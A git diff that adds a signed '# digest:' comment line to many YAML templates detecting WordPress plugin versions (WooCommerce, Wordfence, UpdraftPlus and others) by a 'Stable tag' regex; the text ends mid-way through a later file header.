a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..81027331aa 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c38c6e7ae4b0b920d689826a0e24b3cc12239a5a1a2f10fdef2936851c816114022100f565f47314006a673aed4d83f85142505097efb6ec427f650658b4ea02e505b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..04a87572fa 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022030441c75c70d9e7315eea80e80afcef8390eb19a25425d791cc9d4ab280659da0220702b3330c0957f02bfcaadb4f685b44319a9f453596ec16d2fd0fb226738460e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..9c5e266306 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e72f8438a40d177a19af6ed30c5513314b0e66fd803f4f24c43459461d5d1a102210085994c9d23f14a646dd5dc07e7385e3ddc0c6064efa72ceb3ef1a1d2cba82bb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..e02d21778b 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206eaf7e0b49e28ce381c17456eeca8ba5af3c175fdc5e3c1b4b83d8d3646acfcd022100e0326c56743dada3adb3768b8ea9147e30ea6e3f0776a5d8d466388cc16668f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..a381b416c3 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a58c905230578a4b403d74e7d9103ef792413bb3d7325438ae8736b2e94f32dc022100d60549a0e318aca655e5c4ea60e763fbc51be0b229c9a627efa7e139363e0212:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..606e304e8b 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f399a375b4c45568a38491f34a16d5c607ef295975bb006a71bc8a94cabe81a2022100eb3731d8903c3c792cbea8bbb7ec9833f90b13be801d7ed689b792c99809e9d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..a0426f22e8 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220095eeef95f5e75b2ab03b8a978e5ec813b56c1d6657b9a924d3359da5763cfbc022046d73ec0792b9bbae5cf445028f8c2d31abf0f3a743dbfefef5a539d24a4dad6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..7736aadb9c 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100973aa605f0c6d354b2bb53840292fb6c907db43ff1e88f6c45e48bf19a6273b402206062b97db7c54252cf0d2317efde69a676b22ab0b9e7f4efb0a24b15299712ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..a692745092 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220485610a56efcfd0eeee4a2c5f0668892b9c62779e8b7c920f1fbf3cbe7e5a7e8022008bae5a3b6139fcd141d5a5b7998e7eb6a98894e2565ea5b22f94dbbdc455f6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..e8ce702b73 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022072cf192157f2cc4519935f6806e0679c9f8e1be0869439c4f07b5e068c8fd3e20221009fadd38fdb02a896d952c927249983cb489fceab96490717d737e887403aba14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..fd7f3b3304 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fac65f0eb0aa62535b71cf0f6e47ed9d4bf0e0f709d953f498d0f25567aec693022060ba83dcdb8c0f2148e92788a09eb34b5dfdeef25b583bbe9f8b2fbedbfdc0a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..e93c617ae4 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022053a1b07f544451c478bb2f251ee14707b19f72f8b550a8cc8d0dbfde8ba3bac902207e51ac4aeeefea8a7b6031f08e7003bf20f58b4046bb36566be2f13efedc2f47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..7ee3cb8a9f 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220546f3a7f67cb7005e7aedbaa3101588dea64d1ca0badb125e2346de0fe0f976c02204b59913ba82c6ea7cb76f6eb7811f8336ded74ac24227f3434d05dbb414c54ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..a7914f3e34 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f8539959cbc61226b3526076222ca63480087b1da429ca1e814a850548ea9d89022100c7cdd8c2c646dd2c69e9a25024f95e6c4ec2ec9becbc5e6782e4301834c31258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..245a6240f3 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204d8d391ee895402c4d1df94ee0e71c6a4a041074418f1421ad4cb58fa6560176022100e606e0713a4654b45d56f5d2d5878c098987254d02fcc7e2b27dd95e7892d159:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..7677e97e63 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008d0fef46116bf2dddfb9ea4f727c20a2fa8fb79a8fa2cc13dfb72b5f0a480e5e022100b7cab99ca4ef12e64da03fa1daf081fa4a7a66f626729aece97b2c3362929d49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 38391bd9f3..accc08a18b 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009844f8f52ee932e51071b156b9708af9a2f9f9883618d64b9be5b11af8f9a65c02210096e02f7f18e8475880a23a6f595a7516b2475bf86331d599c5c8d615baece299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..1766a96343 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022031928333120702772175e03202d14da8f04ed69abc6bdf1b23ae8f245bf162cb022100b515ed1bffa9a5553a3d25373125cdb26f85a66da5cd41c7a24661580b31b7cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..a4d8581d4e 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100907a3352e98c748142f4fbf474800d5863e8317a4ebac2243ada378e4b41b796022028665073e9a5b37d8807a65b6dd43cadd8682b281a89eecd7f1816da9f5fad71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..25dc3b21dd 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a98caae280f204baa430d6b1a48cc30d92907a94cdd74dc41d84dbc2bbce2ad2022100bac7da0a2397c5f4ed5da0396d52863c8c12769c0bb10ce2acfdece2b83486d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..b5366c1076 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203b1be62644ea84aa4938779cc0b6f283c851c9b27abad09794b5bbf77924658a0221008f1d626566f908aa54ea42ee1b896ea3a8afa53b6f842d27c6ee05f94adf493c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..a8ecbf55cd 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ef96664dd42071eab9f8e3a6fa8e46ddb52039430788e99ec11320122ca6913d022100d9b2ba16674352cf58813b90d6bbf7973e9f207798f0588fe320e2dd8dd5e7b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..265c6af1dc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210083e341a44305353a235341e216b40588240ecce668778e57ebcffc53b80dee37022100fd59d13595fa59aadd55f171d85a83b8ee043f57707241edfce4185200301527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..97092225cb 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e902d520427972d03d2991ed2b7f8d6a0938779bdc02019193ee6778205a877402206083afa0697bdfab25d9a42bfec63734bfce9b6ba043b19ecc91250ba35734ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..2e9f194e0d 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d662cb04a1dabd1ee76715435dce8bfed247791e074d69ac49d610d82a2ee20d0221008cb4c8b898c555029a02d40cbe4dec2c247b10de9fa02307ed832aa40909e41f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..e470d469b1 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b0533a9ba20b5d3609ca261be08494bba7746fcf3093a4218dbe63a3c85f353c0220248f3541598ad316bd6290943c4a0524b0f403fc9f6df072b4cdef2dc6f8fe06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..24490f6676 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220052a4648293e9d8d5db221c425d200c731bf66056b2dc32edd0e57b625c0d637022100a88a092477b44ffa390ae9ed630e3563fed34062ce863708398678ca88f8fe85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..72032e6c54 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206d040179b8080c1aa4558a08a58e95fc58047042e9c9fe1909d54a35edb5b82702201e4126173e73ecb3a72cb7b4166601413850051f34cc46ab0fe606587c88e985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..d5dac3f9cb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d8b7da572c2822f6655b28145c6cb67bb8b8869948fb03fea677df6867c1ad8a022100aa4ce26e2a282ed121670c44f3dbaf13a111a8900948fbc29d91be6e27944fc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..45e9567375 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec427d83b4fe0369733e0c5fdf7f8eec8c1dd0c44e7bb1fb78f3c3bcfd80dcde0220327c60cebf59e378635a9cf27f6d3f759e0c1ea0463eb724e6fb211b9681d92c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..a06deef3a7 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200ed3e7bc5d9d3d0e95b5ba53fb3b3c685a01b683101cb1dae788fa458c23f5c7022100ec9a7698f50650a3813501cb9966e2b3528f915a7e9e4523702af0fd3abc5ff0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..0f6234a4c9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022074c11f0f07e0fe0c538def6619a55f86e7d04f5df3cbbf71cacc73379d81a90e022100dd8ecbcda91ebeae8e0eaf988010d7012ae1cd0295e3e68647662431a090e64a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..aae3966dba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022010a031d35d0ebcb452f06f1304d25363b6e93ba6cfd6e68dee09dc518a9fee9f022100be00dbcceac8fa501febd8d66d96915a0a67035b196bff8d8c2e66141c4e98d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..dadae6d88d 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202adf67fbf461e376606a486bdc2ff0293722830463e2160e0722ed7f51365416022075d38c67d88b7acb1019e2d5c2a85de89b147a849197d2a9cc04b6ab6b8ca4c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..38393452b9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220655eb9c8cedc50eb5c7869af5a57ac9c715861812e0e050fb8c6c2003b674c4302201af0562e8b7b8f61b2c99b7a583afc79ad2856cea0d2d92025b56ba94bbfeddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..f8d9ab6368 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022039eae9a08f1fee7ad95373b8a5b186fff15313b7cd58e72c2746b50a7129223902202d6a474ec4235ff36b2da3d7ae9dfac74f81b23ed343e1fd50a2eb3078b13513:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..a098dae406 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206293c11aada467bc542635eb3f9c8d42a987c73c677d7176c03d86e99532bd230220454533de766ef8b9599e8158f7e5224ef9496b74d581cb2ccc6a629366ad5e93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..ccc23ffeeb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b4f2f5b837429d493f9fa2124dca2e60692e21fe71dd43aba07824e73724081a022100a813381ff7dc04b4cffe28e3de0bf593a3f310fea2f4ac00b216e700510494f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..f14f19c1af 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b73ae6860edc910ac75071f13c8ddd51eafacedc8edfe67fb94bd2a64851f63d022100e1064bbeee3bc2b5d13424cc3dbcfc4a0ed72fcdeafbb789bb56175c8610c0b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..d293930059 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008e43e11bd55b3edf065784f397c5cb9d0305ff812d42822e8b2f9bc13755b909022100c265425f4c9ce3b9dfc37ba4ffa7239a70f74a7887e5cfd894ad240e12daef27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..b804975091 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cd1d94b86193fc8d0f8214b73fa2ecfd58cfa6d9aaeed9df94efa623d0760fd3022100f70c53f0436442be837d549918953aff1b017f16d926f1785f48732f434a1e51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..1e70540b5c 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220451a59b05bcf4e09db335ef889ba01917e6579ee8899215d652354151bdcd413022016558fe4d2da3d62867c162177fadfd4019c7054b71aecbc710ac115d4275e14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..fcbf218f04 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220522101dfa9bb6c38a0be087da6b667c4cb472a9405dfc60a7a1075c0da92da2a022100fd6c167daddab4bb2214a5c6d99e1ad5554b8555ee4f3908ea70ffb8a7e4b14b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..d8f2649cf9 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f466aa7e6d1122ef1eeca94f6fd71aaa1ff58a244c2d65a3010bf095ba108012022054df6d4fbde272d60b16a179d9102217b2a95ade098dc268941851f67fdeec64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..08a21e9a12 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f69ca12ab116019de54b21faec503496dbca9f22ef5646dcd2f2348cda8a7d5a022100e6359270377aae469568dc721052898f1e7f2033508975708445ee6237436fc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..4230995cbe 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f4b362d553d4277b2794b1c4391b90e590c5ae63bc80eb0ae80c4f0c8f2ef7f00221009ad0a4ebcd091c44a1ec2c5757a5a1bdb242c6fee6b314119624010e24d6ec75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..cb6eaf59c7 100644 --- 